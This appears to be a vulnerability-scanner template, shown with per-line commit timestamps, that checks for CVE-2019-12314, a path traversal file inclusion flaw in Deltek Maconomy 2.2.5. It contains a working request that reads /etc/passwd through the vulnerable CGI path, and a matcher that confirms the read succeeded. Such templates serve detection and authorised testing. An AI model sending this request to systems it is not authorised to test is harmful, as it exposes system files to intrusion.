2021-01-02 04:59:06 +00:00
id : CVE-2019-12314
2020-04-08 08:33:39 +00:00
info :
2022-11-29 05:38:58 +00:00
name : Deltek Maconomy 2.2.5 - Local File Inclusion
2020-04-08 08:33:39 +00:00
author : madrobot
2021-09-10 11:26:40 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
2021-08-18 11:37:49 +00:00
reference :
2022-04-01 08:51:42 +00:00
- http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html
- https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm
- https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-12314
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.23499
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.95935
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : deltek
product : maconomy
tags : cve,cve2019,lfi,packetstorm
2020-04-08 08:33:39 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-08 08:33:39 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 08:33:39 +00:00
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-04-08 08:33:39 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200